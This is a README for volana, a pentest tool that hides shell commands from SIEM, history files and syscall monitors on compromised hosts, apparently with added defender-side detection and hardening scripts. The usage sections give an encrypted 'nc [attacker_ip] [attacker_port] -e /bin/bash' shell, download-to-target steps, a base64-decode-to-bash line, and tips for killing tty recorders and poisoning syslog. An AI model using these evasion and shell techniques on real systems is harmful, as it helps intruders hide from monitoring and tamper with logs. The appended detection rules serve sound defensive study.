# Shell command obfuscation to avoid SIEM/detection systems

During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. However, many infrastructures log commands and ship them to a SIEM in real time, which makes cleaning up afterwards useless on its own.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (you enter your command, volana executes it for you). This way you clear your tracks DURING your passage.
## Usage

You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job! Otherwise, see the non-interactive shell section below.) Then download it on the target machine and launch it. That's it: you can now type the commands you want to be stealthily executed.

```sh
## Download it from the github release
## If you do not have internet access from the compromised machine, find another way
curl -L -O https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 # you are allowed to be a bit cocky
volana » [command]
```
Keywords for the volana console:

* `ring`: enable ring mode, i.e. each command is launched together with plenty of others to cover tracks (against solutions that monitor system calls)
* `exit`: exit the volana console
### From a non-interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE): you can use the encrypt (`encr`) and decrypt (`decr`) subcommands. Beforehand, you must build volana with an embedded encryption key.
On the attacker machine:

```sh
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it to the TARGET (the only detectable command)
## [...]
## Encrypt the command you want to stealthily execute
## (here a nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
```

Copy the encrypted command and execute it with your RCE on the target machine:

```sh
./volana decr [encrypted_command]
## Now you have a bindshell: spawn it to make it interactive and use volana as usual to be stealthy (./volana).
## Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it).
```
Why not just hide the command with `echo [command] | base64` and decode it on the target with `echo [encoded_command] | base64 -d | bash`?

Because we want to be protected against systems that trigger an alert on base64 use or that search for base64 text in commands. Also we want to make investigation difficult, and base64 isn't a real brake.
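For the defender's side of that argument, here is the kind of rule such systems run. This is an added example, not code from volana or its author: it filters command-log lines for base64 output piped into a shell, and deliberately does not fire on ordinary `base64` use, so a plain encoder invocation is not treated as a finding. The log lines are constructed for the example; the function name is an assumption.

```shell
#!/bin/sh
# Added example (not part of volana): a command-log rule for decode-and-execute pipelines.

# Constructed command-log lines, one command per line (not real logs).
# "aWQK" is base64 of "id\n", "ZGF0ZQo=" is base64 of "date\n".
SAMPLE_CMDLOG='ls -la /tmp
echo "aWQK" | base64 -d | bash
base64 /etc/hostname
printf ZGF0ZQo= | base64 --decode | sh
cat /var/log/syslog | grep -i error'

# flag_decode_to_shell: reads command lines on stdin and prints those where
# `base64 -d` / `base64 --decode` output is piped into sh, bash, zsh or dash.
# Plain `base64 file` (encoding, or decoding to a file) is not reported, which
# keeps the rule from alerting on routine admin use.
flag_decode_to_shell() {
    grep -E 'base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)'
}

# Example run: prints the two decode-to-shell lines from the constructed log.
printf '%s\n' "$SAMPLE_CMDLOG" | flag_decode_to_shell
```

Note that this is exactly the rule the README's point is about: an encrypted blob handed to a custom binary never matches it, which is why a defender cannot rely on base64 signatures alone and should pair them with the process-level controls described further down.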
## Detection

Keep in mind that volana isn't a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By "detected" we mean that an alert can be triggered when a certain command has been executed.
### Hidden from

- Detection systems based on the `history` command output
- Detection systems based on history files (`.bash_history`, `.zsh_history`, etc.)
  - Only the volana launching command line will be caught. 🧠 However, by adding a space before executing it, the default bash behaviour is to not save it
- Detection systems based on bash debug traps
- Detection systems based on the sudo built-in logging system
- Detection systems tracing all processes' syscalls system-wide (e.g. `opensnoop`)
- Terminal (tty) recorders (`script`, `screen -L`, `sexonthebash`, `ovh-ttyrec`, etc.)
  - Easy to detect & avoid: `pkill -9 script`
  - Not a common case
  - `screen` is a bit more difficult to avoid; however it does not record input (secret input: `stty -echo` => avoided)
- Command detection could be avoided with volana with encryption
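The leading-space trick above only works because many distributions ship a `.bashrc` with `HISTCONTROL=ignoreboth` (or `ignorespace`); it is a shell setting, not a bash built-in default. The following is an added example from the defender's side, not code from volana or its author: a small audit of the history settings of an interactive bash session, plus the profile lines that make the launch line (the one thing the list above says is still visible) get written to the history file and forwarded to syslog immediately. It records only the launch line; commands typed inside volana's own runtime stay invisible to these controls, as the README says. The `/etc/bash.bashrc` path, the `bash_cmd` syslog tag and the history sizes are assumptions.

```shell
#!/bin/sh
# Added example (not part of volana): audit and harden bash history settings.

# audit_history_settings HISTCONTROL HISTFILE HISTSIZE
# Prints one finding per line for settings that let commands escape the history
# file; prints nothing when the settings look sane. Pass the values of the
# session you are auditing, e.g.: audit_history_settings "$HISTCONTROL" "$HISTFILE" "$HISTSIZE"
audit_history_settings() {
    hc=$1; hf=$2; hs=$3
    case "$hc" in
        *ignorespace*|*ignoreboth*)
            echo "HISTCONTROL=$hc: space-prefixed commands are never written to history" ;;
    esac
    [ -z "$hf" ] && echo "HISTFILE is unset: no history file is written at all"
    [ -n "$hf" ] && [ "$hf" = /dev/null ] && echo "HISTFILE=/dev/null: history is discarded"
    [ "$hs" = 0 ] && echo "HISTSIZE=0: in-memory history is disabled"
    return 0
}

# hardened_history_profile: prints the lines a defender would append to
# /etc/bash.bashrc (Debian-style path, an assumption) so that every interactive
# command, including one typed with a leading space, is flushed to the history
# file at once and also sent to syslog (which is what usually feeds the SIEM).
hardened_history_profile() {
    cat <<'EOF'
export HISTCONTROL=ignoredups            # keep space-prefixed commands
export HISTSIZE=100000 HISTFILESIZE=100000
shopt -s histappend
PROMPT_COMMAND='history -a'             # flush each command to the file immediately
trap 'logger -p auth.info -t bash_cmd "$USER $(tty) $BASH_COMMAND"' DEBUG
readonly HISTCONTROL HISTFILE HISTSIZE HISTFILESIZE PROMPT_COMMAND
EOF
}

# Example run against a typical distro default: reports the ignoreboth finding.
audit_history_settings ignoreboth "$HOME/.bash_history" 1000
```

The `readonly` line stops an unprivileged session from simply unsetting the variables again, but a user who can start a different shell or a binary with its own runtime is of course outside its reach; that is the gap the process-level controls in the next list exist for.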
### Visible to

- Detection systems that alert on unknown commands (the volana one)
- Detection systems based on a keylogger
  - Easy to avoid: copy/paste commands
  - Not a common case
- Detection systems based on syslog files (e.g. `/var/log/auth.log`)
  - Only for `sudo` or `su` commands
  - The syslog file could be modified and thus poisoned as you wish (e.g. for `/var/log/auth.log`: `logger -p auth.info "No hacker is poisoning your syslog solution, don't worry"`)
- Detection systems based on syscalls (e.g. auditd, LKM/eBPF)
  - Difficult to analyse; could be made unreadable by making multiple diversion syscalls
  - Custom `LD_PRELOAD` injection to produce logs
    - Not a common case at all
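The diversion syscalls of ring mode make a syscall trace harder to read, but the noise is itself a signal: one parent process spawning a burst of short-lived children is unusual for an interactive session. Below is an added example of that heuristic, not code from volana or its author. It runs over constructed process-creation events reduced to `epoch_seconds ppid pid comm` (a simplified format, not real auditd output, and assumed to be in time order as audit logs are) and reports every parent that started at least `THRESHOLD` children within any `WINDOW` seconds. The window and threshold values are assumptions to tune per environment.

```shell
#!/bin/sh
# Added example (not part of volana): flag parents that spawn a burst of children.

# Constructed process-creation events: "epoch_seconds ppid pid comm", time-ordered.
# pid 2001 is a shell-like process that launches six children within two seconds;
# pid 1000 is a normal session that starts a shell and, much later, an editor.
SAMPLE_EVENTS='1700000000 1000 2001 bash
1700000000 2001 2002 ls
1700000000 2001 2003 id
1700000000 2001 2004 uname
1700000001 2001 2005 cat
1700000001 2001 2006 date
1700000001 2001 2007 whoami
1700000030 1000 2008 vim'

# burst_parents WINDOW_SECONDS THRESHOLD
# Reads events on stdin and prints each ppid that spawned at least THRESHOLD
# children inside some WINDOW_SECONDS span (sliding window per parent).
burst_parents() {
    awk -v win="$1" -v thr="$2" '
    {
        ts = $1; ppid = $2
        n[ppid]++                       # children seen so far for this parent
        t[ppid, n[ppid]] = ts           # their timestamps, in input (time) order
    }
    END {
        for (p in n) {
            i = 1                       # left edge of the window
            for (j = 1; j <= n[p]; j++) {
                while (t[p, j] - t[p, i] > win) i++
                if (j - i + 1 >= thr) { print p; break }
            }
        }
    }'
}

# Example run: five or more children within five seconds flags parent 2001 only.
printf '%s\n' "$SAMPLE_EVENTS" | burst_parents 5 5
```

In a real deployment the event stream would come from auditd `execve` records or an eBPF exec tracer, and the flagged ppid is the pivot for investigation: its own executable, its parent, and the tty it came from. Build tools and cron jobs also spawn bursts, so the threshold needs an allow-list of known parents to stay quiet.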
## Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. 🐛

Let me know if you have found:

* a way to detect volana
* a way to spy on the console that does not detect volana commands
* a way to avoid a detection system

## Credits